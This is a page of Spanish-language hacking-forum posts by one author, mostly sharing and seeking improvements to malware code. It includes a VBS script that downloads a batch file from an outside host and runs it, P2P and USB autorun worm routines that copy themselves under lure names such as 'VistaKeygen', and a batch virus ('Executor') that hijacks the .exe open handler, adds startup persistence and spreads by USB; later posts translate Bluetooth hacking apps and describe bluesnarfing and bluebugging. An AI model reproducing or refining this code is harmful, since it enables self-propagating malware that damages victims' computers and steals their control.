mode con lines=20
@echo off
title Propagacion a traves de Internet - By :: SmartGenius ::
color 0a

:ini
cls
echo.
echo.
echo  Este es un Archivo de Comandos BATCH descargado
echo  a traves de internet mediante un Script VBS
echo  insertado en una Pagina HTML.
echo.
echo  El Script es capaz de Bajar y Ejecutar Codigo, casi
echo  sin permiso del Usuario...
echo.
echo  Por ahora es Solo una idea, pero espero poder
echo  desarrollarlo completamente...
echo.
echo  Un Saludo... ;)
echo.
pause
exit

El cual puede ser una serie de comandos Batch, ya sea de virus o bromas o cualquier otra cosa, o puede ser tambien cualquier otro archivo...

Ahora tomemos un script VBS que nos descarga y nos ejecuta el archivo...

VBS Downloader
Código:
Set aVar = CreateObject("Microsoft.XMLHTTP")
aVar.Open "GET","http://two.xthost.info/smartgenius/codigo.txt",0
aVar.Send()
Set sDow = CreateObject("ADODB.Stream")
sDow.Mode = 3
sDow.Type = 1
sDow.Open()
sDow.Write(aVar.responseBody)
sDow.SaveToFile "codigo.bat",2
Set codigo = CreateObject("WScript.Shell")
codigo.Run "Codigo.bat"

y por ultimo una pagina HTML con codigo VBS insertado para crear archivos de texto plano en la PC...

Pagina HTML Decorada...xD
Código:
<HTML>
<HEAD><TITLE>.:: SmartGenius - powered by iSmart ::.</TITLE>
</HEAD>
<BODY bgColor=#000000 text="green">
<script language="vbs">
Dim smart, archivo
Set smart = CreateObject("Scripting.FileSystemObject")
set archivo= smart.CreateTextFile("pepito.bat", True)
archivo.WriteLine("@echo off")
archivo.WriteLine("title SmartGenius")
archivo.WriteLine("color 0a")
archivo.WriteLine("echo  Hola")
archivo.WriteLine("echo  Codigo de Prueba")
archivo.WriteLine("pause")
archivo.close
</script>
<center><h1>Propagacion de Code a traves de Internet</h1><br><br>Demostracion de Descarga y Ejecucion de Codigo...by :: SmartGenius ::</center>
</BODY>
</HTML>

Entonces, la pagina HTML crea un archio en la PC, en este caso un Bat que dice prueba y no mas...

La teoria seria que la pagina HTML creara y ejecutara el segundo codigo, el VBS Downloader y este se encarga de descargar y ejecutar el resto...

Pueden guardar el VBS Downloader y ejecutarlo y veran como descarga y ejecuta el otro bat, y seria posible hacerlo de manera oculta agregando al final ,vbHide...

Hasta aqui todo bien, lo unico que no logro hacer es crear el codigo del VBS Downloader a partir de la pagina HTML.... ya que como es un code VBS creando otro VBS es en ese momento donde hay un problema porque hay ciertos caracteres y funciones reservadas, y no logro que el code salga bien...

Es por ahora una teoria, pero espero poder desarrollarla completamente y dar una nueva posibilidad de propagacion a nuestros codes...

Agradeceria un poco de ayuda, de los expertos en VBS...NovLucker ??..

Un Saludo.
26  Programación / Scripting / [Batch] Nueva Propagacion P2P - by SmartGenius en: 19 Julio 2008, 04:31 am
He visto por ahi un par de codes para realizar este tipo de propagacion pero la verdad que siempre son extensos debido a la cantidad de programas que existen para el uso de este tipo de protocolos y a la cantidad de veces que debemos copiarnos...

Al igual que la propagacion por USB, pienso que este codigo puede optimizarse y mejorarse para hacerlo mas liviano y con mayor efectividad...

Yo tenia pensado algo con FOR y CALL de la siguiente manera

for /F %%a in (Aqui las variantes) do (call :p2p %variante%)

y en el cual la funcion p2p tendra los comandos para copiarnos a los directorios compartidos por estas aplicaciones...

Aqui pongo un codigo de ejemplo, a ver como podemos mejorarlo y optimizarlo...

Código:
:inicial
set nosotros=%0
for /F %%v in (VistaKeygen,EmoticonesMSN,SerialOffice2007,ParisXXXPhotos) do (call :p2p %%v)
goto :eof


:p2p
set var=%1
copy %nosotros% "%programfiles%\Grokster\My Grokster\%var%.bat"
copy %nosotros% "%programfiles%\Morpheus\My Shared Folder\%var%.bat"
copy %nosotros% "%programfiles%\ICQ\shared files\%var%.bat"
copy %nosotros% "%programfiles%\KaZaA\My Shared Folder\%var%.bat"
copy %nosotros% "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat"
copy %nosotros% "%programfiles%\EDONKEY2000\incoming\%var%.bat"
copy %nosotros% "%programfiles%\eMule\Incoming\%var%.bat"
copy %nosotros% "%programfiles%\Filetopia3\Files\%var%.bat"
copy %nosotros% "%programfiles%\appleJuice\incoming\%var%.bat"
copy %nosotros% "%programfiles%\Gnucleus\Downloads\%var%.bat"
copy %nosotros% "%programfiles%\LimeWire\Shared\%var%.bat"
copy %nosotros% "%programfiles%\Overnet\incoming\%var%.bat"
copy %nosotros% "%programfiles%\Shareaza\Downloads\%var%.bat"
copy %nosotros% "%programfiles%\Swaptor\Download\%var%.bat"
copy %nosotros% "%programfiles%\WinMX\My Shared Folder\%var%.bat"
copy %nosotros% "%programfiles%\Tesla\Files\%var%.bat"
copy %nosotros% "%programfiles%\XoloX\Downloads\%var%.bat"
copy %nosotros% "%programfiles%\Rapigator\Share\%var%.bat"
copy %nosotros% "%programfiles%\KMD\My Shared Folder\%var%.bat"
copy %nosotros% "%programfiles%\BearShare\Shared\%var%.bat"
copy %nosotros% "%programfiles%\Direct Connect\Received Files\%var%.bat"
copy %nosotros% "%appdata%\Ares\My Shared Folder\%var%.bat"
goto :eof

Lo veo mas corto y mas entendible que otros codigos que haya visto por ahi, pero habria que aumentar su efectividad...

Espero las sugerencias...

Saludos.
27  Programación / Scripting / Propagacion por USB 2 - by SmartGenius en: 23 Mayo 2008, 01:27 am
Creo que hasta ahora es la mejor manera para copiarse y repartirse por USB, aunque es posible optimizarlo tambien usando el comando FOR...

Para el uso de esto se debe hacer una llamada a la etiqueta :copiausb a traves del comando call..

Por ejemplo:

call :copiausb y el code hara el resto de crear el autorun y de copiarlo a las diferentes unidades...

Código:
:copiausb
if exist C: call :creausb C
if exist D: call :creausb D
if exist E: call :creausb E
if exist F: call :creausb F
if exist G: call :creausb G
if exist H: call :creausb H
if exist I: call :creausb I
if exist J: call :creausb J
if exist K: call :creausb K
goto :eof

:creausb
copy %0 "%1:\nombre.bat"
echo [Autorun] > "%1:\AutoRun.inf"
echo open="nombre.bat" >> "%1:\AutoRun.inf"
echo action=Abrir Pendrive >> "%1:\AutoRun.inf"
echo shellexecute= "/nombre.bat" >> "%1:\AutoRun.inf"
goto :eof

Ademas que puede ser extendido para que detecte mas unidades, sin extender tanto el codigo, ahorrandonos varias lineas...

Para la parte del for tengo este code pero no lo he probado:

Código:
FOR %%a in (  C D E F G H I J K L M ) do (if exist %%a: (call :creausb %%a))

Espero que les sea de utilidad.

Saludos.
28  Programación / Scripting / [Batch] Executor, mi primer bichito"mutante"... en: 23 Mayo 2008, 00:54 am
Bueno pues me he dedicado a hacer un code para un virusito que se encargue de deshabilitar los ejecutables, y al tiempo que muestre un mensaje de error pero al azar, para esto he usado una funcion que yo mismo me habia ideado y he usado VB para esta parte porque se ve un poco mas bonito y asi me evito problemas con el msg...

Tambien he hecho que se copie por USB, e igualmente con nombres al azar, por lo que seria un poco mas dificil rastrearlo, y esto es lo que le daria la caracteristica de "mutante"..

Lo he llamado Executor, pues se imaginaran porque ??  ;D ;D

Código:
@echo off
title Executor - by SmartGenius
rem Virus que se encarga de deshabilitar el inicio
rem de aplicaciones ejecutables o .EXE, y ademas
rem de mostrar mensajes de error al azar y copiarse
rem atraves de USB con nombres diferentes...

:ini
if exist "%windir%\system32\exer.exe" goto main
if exist "%windir%\system32\extool.exe" goto main
if exist "%windir%\system32\brush.exe" goto main
if exist "%windir%\system32\linux.exe" goto main
if exist "%windir%\system32\herr.exe" goto main
if exist "%windir%\system32\smart.exe" goto main
if exist "%windir%\system32\help.exe" goto main
if exist "%windir%\system32\fuck.exe" goto main
if exist "%windir%\system32\hello.exe" goto main
if exist "%windir%\system32\open.exe" goto main

:crea
call :rdn
call :name%r%
copy %0 "%windir%\system32\%nam%.exe"
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d "%nam%.exe" /f
reg add HKCR\exefile\shell\runas\command /ve /t REG_SZ /d "%nam%.exe" /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "%run%" /t REG_SZ /d "%windir%\system32\%nam%.exe" /f
set my=%0
call :main
ping -n 100 0.0.0.0 > nul
goto ini

:rdn
set p=
set /a p=((%random%*%random%)+%random%)/%random%
set r=%p:~-1%
goto :eof

:name1
set nam=
set nam=exer
set run="Herramienta del Sistema"
goto :eof

:name2
set nam=
set nam=extool
set run="Systool"
goto :eof

:name3
set nam=
set nam=brush
set run="Ayuda"
goto :eof

:name4
set nam=
set nam=linux
set run="Microsoft"
goto :eof

:name5
set nam=
set nam=herr
set run="Inicio"
goto :eof

:name6
set nam=
set nam=smart
set run="Smart"
goto :eof

:name7
set nam=
set nam=help
set run="Mantenimiento"
goto :eof

:name8
set nam=
set nam=fuck
set run="You"
goto :eof

:name9
set nam=
set nam=hello
set run="Limpieza"
goto :eof

:name0
set nam=
set nam=open
set run="Adobe"
goto :eof

:main
call :msgr
call :copiausb
goto :eof

:msgr
call :rdn
call :msg%r%
goto :eof

:msg1
echo MsgBox "Error del Sistema. No se puede continuar.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg2
echo MsgBox "No se puede Abrir.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg3
echo MsgBox "Archivo Corrupto.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg4
echo MsgBox "Error de Datos.Comprobacion de Redundancia Ciclica", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg5
echo MsgBox "Error de Configuracion. No se puede continuar.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg6
echo MsgBox "El Sistema no Responde.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg7
echo MsgBox "No hay Memoria suficiente para realizar la Accion.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg8
echo MsgBox "Visita http://foro.code-makers.es.", 16, "Visitanos..." >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg9
echo MsgBox "You was owned by iSmart.", 16, "Hacktool" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:msg0
echo MsgBox "Fuck You :P.", 16, "Error del Sistema" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto :eof

:copiausb
if exist C: call :creausb C
if exist D: call :creausb D
if exist E: call :creausb E
if exist F: call :creausb F
if exist G: call :creausb G
if exist H: call :creausb H
if exist I: call :creausb I
if exist J: call :creausb J
goto :eof

:creausb
call :rdn
call :name%r%
copy %my% "%1:\%nam%.exe"
echo [Autorun] > "%1:\AutoRun.inf"
echo open="%nam%.exe" >> "%1:\AutoRun.inf"
echo action=Abrir Pendrive >> "%1:\AutoRun.inf"
echo shellexecute= "\%nam%.exe" >> "%1:\AutoRun.inf"
goto :eof

Tambien fijarse que he optimizado bastante la parte de copia USB, esta se me ocurrio como a media noche mientras no podia dormir... :D

Toda la parte de funciones al azar es de mi invencion, y me ha quedado fina  ::)

Quiero que lo miren, y me digan posibles mejoras, aunque se que me falta algo de uso de %errorlevel% y esas cosas en caso de que algo falle no se salga del programa...

Saludos.
29  Comunicaciones / Hacking Mobile / [TUTORIAL] Como Traducir Aplicaciones JAVA Moviles ¡¡ en: 11 Mayo 2008, 05:38 am

TUTORIAL: TRADUCCION DE APLICACIONES JAVA - MOVILES

Bueno, he querido hacer este tuto desde hace tiempo, debido a que me he encontrado con grandes herramientas tanto para hacking como para otros fines, que son programadas en JAVA, diseñadas para los celulares (moviles) y que vienen en idiomas diferentes del Español.

Primero decirles que necesitamos para el procedimiento de Traduccion:

- La App a Traducir
- Un Descompresor (WinRAR)
- Un Descompilador (opcional)
- Lectores de Clases Java
- Buen conocimiento del lenguaje nativo de la aplicacion, para hacer una buena traduccion.


Bien, empecemos:

Generalmente los archivos en java viene con extension .jar


por lo que debemos cambiarla por .zip o .rar, y proceder a descomprimirla en un directorio  para poder trabajar por separado en cada una de las clases que la componen...


Entonces aqui es donde se define que tipo de trabajo debemos hacer, ya que nos podemos encontrar aplicaciones que cuentan con un fichero lang, que esencialmente es un archivo de texto plano con todas las strings que usa el programa, hasta archivos .class que vienen compiladas en JAVA Binario...

Paso 1. Archivo Lang - Texto Plano

Nos Basaremos en la Aplicacion BT Info - Super Bluetooth Hack 1.08

Para este tipo de aplicaciones solo es necesario descomprimirla y una vez ubicado el archivo de lenguaje, este se abre con un editor de textos normal, en este caso nos referimos al bloc de notas...

Ubicamos el archivo lang...


en este caso una carpeta con los archivos usados por la aplicacion...


escogemos el primero y lo abrimos con el bloc de notas...

Nos damos cuenta que es el archivo con el listado de los lenguajes que usa
el programa, asi que solo traducimos la linea que dice "English" por "Español".



En este caso no tenemos que traducir todos los archivos, ya que solo necesitamos modificar el archivo C que es el del lenguaje ingles, el cual vamos a traducir al español, los demas los dejamos como estan...


Traducimos todas las frases y cadenas de texto al español, y una vez finalizado este proceso guardamos el archivo...

Revisamos si no hay otros archivos por traducir, y cuando estemos listos vamos a "instalar" estos archivos en la aplicacion... Paso 3.

Paso 2. Archivo .CLASS - Java Binario

Bueno, basicamente es el mismo proceso que el anterior, solo que este implica revisar uno por uno los archivos, ademas de que no lo hacemos con el Bloc de Notas sino con otras herramientas mas avanzadas.

Si queremos descompilar los archivos, ver su estructura, codigo fuente y funcionamiento en JAVA, pues usaremos el DJ Java Decompiler, pero como solo vamos a traducirla para nuestro proposito y no mas, pues entonces hacemos uso de otras dos herramientas...

InClassTranslator y MobiTrans


Los dos programas son muy parecidos en su funcionamiento, pero yo recomiendo usar el MobiTrans, igual eso es decision de ustedes.

Ambos programas cuentan con un area en la que muetran el listado de las "strings" o frases en el idioma nativo de la aplicacion, un area donde se muestra la actual selecionada, y una parte donde se debe introducir la traduccion de esa frase o "string".

Bueno, usaremos el MobiTrans...

Para este caso nos basaremos en el BT File Manager, cuyo archivo de idioma es el "e.class",
lo abrimos con el programa y ese nos preguntara que tipo de clase es:


Entonces escogemos una clase normal, aunque fijense que hay clases especiales como son las de Macrospace, Handy-Games o Gameloft.

Vemos que nos ha cargado toda la lista de "Strings" usadas por la aplicacion, asi que empezamos por la primera, le damos doble click y nos sale un cuadro de dialogo con la original y un espacio para escribir la traduccion...


Luego alli escribimos el correspondiente de la Frase original pero en nuestro idioma, y luego damos en el boton OK.

Repetimos este paso para todas las frases, y una vez finalizado el proceso procedemos a guardar el trabajo hecho.

Solamente damos en el boton de guardar, y en el dialogo que nos sale le damos OK, el resto no lo tocamos para nada.


Entonces volvemos al directorio donde teniamos descomprimida la aplicacion, y veremos que se han creado varios archivos...

De alli cambiamos el nombre de la clase "e.class" a e.class.bac, ya que esta es la clase original, y el archivo que nos creo el traductor llamado "e.class.ru" lo renombramos a "e.class", y hacemos el mismo proceso con cualquier otro archivo de clase que hayamos
traducido con el programa.

Una vez se haya finalizado este proceso, estamos listos para "instalar" la traduccion en la aplicacion.

Paso 3. "Instalar" la traduccion en la Aplicacion original.

Para este paso haremos uso del descompresor que hayan usado para descomprimir la aplicacion (en este caso WinRAR).
 
Abrimos la aplicacion original y alli nos dirigimos hasta el directorio donde se encuentra el archivo original que contiene todas las "strings" o frases que usa la aplicacion, ya sea en texto plano o en .class, para ambos es lo mismo.

Aparte y con el explorador de archivos, nos dirigimos hasta la carpeta donde tenemos la aplicacion descomprimida y ya traducida, seleccionamos el archivo ya modificado y lo "arrastramos" hasta el WinRAR.


Nos sale un cuadro de dialogo en el que solo debemos de presionar OK.

Y si el WinRAR nos dice que si queremos modificar el archivo que ya esta adentro le decimos que SI, luego de esto haremos el mismo proceso para cada uno de los archivos que hayamos traducido o modificado, luego una vez finalizado todo podemos cerrar el Winrar...

Y ahora, solo hace falta volver a cambiarle la extension al archivo de .ZIP a .JAR para que pueda ser aceptada por el telefono, instalan la aplicacion el el telefono y....... wala..... ya la tienen en Español.

Aqui tienen los dos programas traductores, mas este mismo manual en formato DOC (word)...

Link: http://rapidshare.com/files/114045223/TraductoresJAVA-TutorialBySmartgenius.rar

Disfrutenlos, y a traducir se dijo Señores ;) ;)
Saludos.

Tuto by :: SmartGenius ::

http://thesmartgenius.wordpress.com

Saludos.  :D :D

30  Comunicaciones / Hacking Mobile / BlueJacking - BlueSnarfing - BlueBugging - BlueToothing en: 11 Mayo 2008, 05:37 am

BlueJacking

Bluejacking es el envio de mensajes sin permiso a traves de dispositivos con Bluetooth como celulares, PDAs, portatiles y algunos PCs, enviando una vCard, una Nota o un Contacto que usualmente contiene un mensaje el campo del nombre a otro dispositivo Bluetooth a traves del protocolo OBEX.

Bluetooth tiene un rango muy limitado, usualmente alrededor de 10 metros en algunos celulares, pero en portatiles puede superar los 100 metros con algunos transmisores potentes.

El Nombre fue originado por un usuario llamado AJACK, quien estando en un banco, busco algun dispositivo Bluetooth encendido y al encontrar un Nokia 7650, le envio un mensaje diciendo “Compra Sony Ericsson”. El lo llamo bluejacking, y asi se ha hecho desde entonces.

Ajack junto con Droll posteriormente desarrollaron una utlidad para Symbin UIQ llamada SMan que llego a ser la primera utilidad de bluejacking para un smartphone. Ya recientemente se desarrollaron aplicaciones para otras plataformas como java, de las cuales podemos nombrar al Mobiluck, el EasyJack, y una hecha por la misma compañía Nokia llamada Sensor.

Algunos piensan que el termino bluejacking viene de la palabra Bluetooth y la palabra hijacking. Esto sonaria logico, pero un bluejacker no hace hijack con nada: el o ella unicamente usa una opcion en el envio y el dispositivo recipiente (receptor). Un bluejacker no esta en la capacidad de tomar control de tu telefono o de robar informacion personal. ne Mas bien esta orientado a hacer bromas o molestar a alguien, y tal vez de alli es que viene el termino.

El Bluejacking es algo gracioso, porque la persona bluejackeada no sabe lo que esta pasando, y piensa que su telefono esta funcionando mal  ;).

Usualmente un bluejacker solo envia un mensaje de texto, pero con los telefonos modernos es possible hasta enviar imagines o sonidos tambien.

Esto del Bluejacking a sido usado para Tecnicas de marketing en algunos centros comerciales quienes se hacen publicidad a traves de este medio.

Pero con el incremento de los dispositivos con soporte bluetooth , algunos de estos dispositivos (especialmente PDAs y alunos moviles con Symbian) se han vuelto vulnerables, desde ataques de virus, hasta el control total del dispositivo a traves de programas Troyanos.


BlueSnarfing

Bluesnarfing es el robo de informacion de un dispositivo inalambrico a traves de una conexion Bluetooth, ya sea entre telefonos, portatiles o PDAs.

Esto permite acceso al calendario, la lista de contactos, correos y mensajes de texto. Bluesnarfing es mucho mas serio en relacion al Bluejacking, pero ambos “explotan” otros dispositivos Bluetooth sin su conocimiento.

Cualquier dispositivo que tenga encendido el Bluetooth y este se encuentre en Modo Descubierto (osea que puede ser encontrado por otros dispositivos en el rango) puede ser atacado. Apagando esta opcion puede protegerse de la posibilidad de ser Bluesnarfiado. Siendo esto una invasión de la privacidad, el Bluesnarfing es ilegal en algunos paises.

Dentro de este Rango de Herramientas Encontramos al Mismo BT Info (Super Bluetooth Hack), el BT File Manager, el BT Explorer, Miyux y otra gran variedad de utilidades.


BlueBugging

Alguna gente considera el Bluebugging como una forma de Bluesnarfing. Pero la naturaleza de este es muy diferente.

Blue Bugging fue inventado en 2004, mas o menos un año despues de que empezara el Bluesnarfing. Mientras el bluesnarfing se trata de robar cosas o archivos del dispositivo de la victima, el Blue Bugging hace un trabajo diferente.

Toma el control del movil de la victima, y por medio de comandos hace lo que el BlueBugger desee (dentro de este rango tenemos al BT Info o Super Bluetooth Hack).

Para decirlo en palabras faciles, significa que el bluebugger toma el control de tu telefono, y lo usa para enviar mensajes o para hacer una llamada.

Mientras al principio el bluebugging requeria que el bugger(literalmente) usara un dispositivo previamente acomodado, las nuevas herramientas del bluebugging  han hecho la mayor parte del trabajo, lo que significa que cualquiera con el conocimiento y la herramienta adecuada puede tomar control de tu telefono.

Las posibilidades y consecuencias de esto, estan a la Imaginación.


Bluetiming o Toothing

Podria decirse que es una variante del BlueJacking, la cual se dice, es para promover encuentros del tipo sexual (citas, encuentros y esas cosas) mediante la cual un dispositivo Bluetooth es usado para “descubrir” otros dispositivos bluetooth en el rango, y les envia un mensaje sugestivo, algo asi como: Hablamos ? Donde nos vemos ?.

Se crea una red de encuentros furtivos con otros dispositivos bluetooth, generalmente en areas con mucha afluencia de publico como Centros Comerciales y parecidos, la cual no solo es para encuentros y charlas, sino tambien para compartir cosas, lo que a logrado que se desarrollen aplicaciones dentro de la categoría MoSoSo (Software para sociabilidad movil, Mobile Social Software en Ingles.) dentro de las cuales podemos contar el Mobiluck, el Bluejack, y los recientes Chat2u o Bluetooth Messenger. Tambien tenemos aquí al “Sensor” de Nokia.


Fuente: BlueJacking Tools
Traducción y Adaptacion by :: Smartgenius ::


Aqui hay un Set de Herramientas para usar, con este tipo de ataques

http://foro.elhacker.net/hacking_mobile/herramientas_bluejacking_bluesnarfingetc-t211880.0.html


Saludos.
Páginas: 1 2 [3] 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines